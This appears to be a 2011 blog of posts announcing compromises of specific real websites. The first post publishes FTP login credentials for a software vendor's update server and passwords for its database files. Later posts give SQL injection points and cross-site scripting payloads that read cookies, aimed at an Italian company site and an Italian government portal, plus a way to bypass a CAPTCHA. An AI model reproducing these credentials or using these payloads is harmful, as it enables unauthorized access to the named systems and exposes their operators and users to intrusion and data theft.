Saturday, 17 December 2011

europenet.com bravo - ftp access - update suggestions - system compromise

europenet.com bravo update server

address: vm203034.planetacomnetwork.com
user: bravoupdate
pass: eunesr


OKey40 and okeyupd folders should be used to update the normal Okey client.
To update flawlessly without restarting each time the update_exe.exe if a download fails. You can resume the downloads with any ftp client instead of download the files from the beginning).

save the files in "Dati/Temp" and set them as read only (to avoid the deletion). After the update clean the folder except for agg.dat.

The password for MagicDb.mdb is "magic"
The password for catc.dat is "128159a7c9f2009"
(both are Ms Access files)

I cannot test the firmware and the -programmer- I don't have one and I don't own any of those products.

------------------------------------------------------------

Other informations cannot be published ... sorry.

Friday, 9 December 2011

pigrecotechnology.it SQL Injection, XSS, nt system compromise

Sql Injection
www.pigrecotechnology.it/Archivio/goRicerca.asp?tipologia=tesi

Sql injection and XSS
http://www.pigrecotechnology.it/Search/contRicerca.asp
in the search form
"><script>alert(document.cookie);</script><"


XSS
http://www.pigrecotechnology.it/riservata.asp?messaggio=%3CIMG%20SRC=%27vbscript:msgbox%28%22hello%22%29%27%3E


useless CAPTCHA
http://www.pigrecotechnology.it/riservata.asp
You can get the captcha code (numbers) from the name of the images. It can be easily avoided by a very simple bot. It's just useless.

Monday, 5 December 2011

italia.gov.it XSS

http://www.italia.gov.it/itagov2/content/cerca-i-servizi-online?param3=Lavoro'%20%3Cscript%3Ealert(document.cookie);%3C/script%3E

other informations cannot be published ... sorry